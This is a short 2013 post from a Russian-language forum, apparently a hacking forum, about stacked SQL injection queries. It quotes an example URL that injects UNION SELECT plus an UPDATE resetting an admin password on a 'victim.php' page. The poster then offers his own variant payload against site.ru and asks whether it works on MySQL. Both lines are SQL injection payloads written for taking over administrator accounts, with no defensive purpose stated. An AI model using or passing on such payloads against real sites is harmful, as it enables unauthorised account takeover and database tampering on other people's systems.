12.12.2013, 22:09
|
|
Участник форума
Регистрация: 03.06.2011
Сообщений: 288
С нами:
7864886
Репутация:
-5
|
|
Сообщение от YaBtr
Точнее нельзя использовать несколько запросов, точнее возможно, но их нужно разделять точкой с запятой
;
.
Например:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]www[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]site[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]com[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]victim[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#DD0000"]'+union+select+1,2,3...; UPDATE '[/COLOR][COLOR="#0000BB"]admin_login[/COLOR][COLOR="#DD0000"]' SET '[/COLOR][COLOR="#0000BB"]password[/COLOR][COLOR="#DD0000"]' = '[/COLOR][COLOR="#0000BB"]pas1[/COLOR][COLOR="#DD0000"]' WHERE login_name='[/COLOR][COLOR="#0000BB"]adm[/COLOR][COLOR="#DD0000"]'
[/COLOR][/COLOR]
В случае с Mysql это не прокатит. вот так?
http://site.ru/index.php?id=123'+UNION+SELECT+1,2,3,admin,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18 UPDATE 'admin' SET 'password' = '123' WHERE username='admin'+--+
|
|
|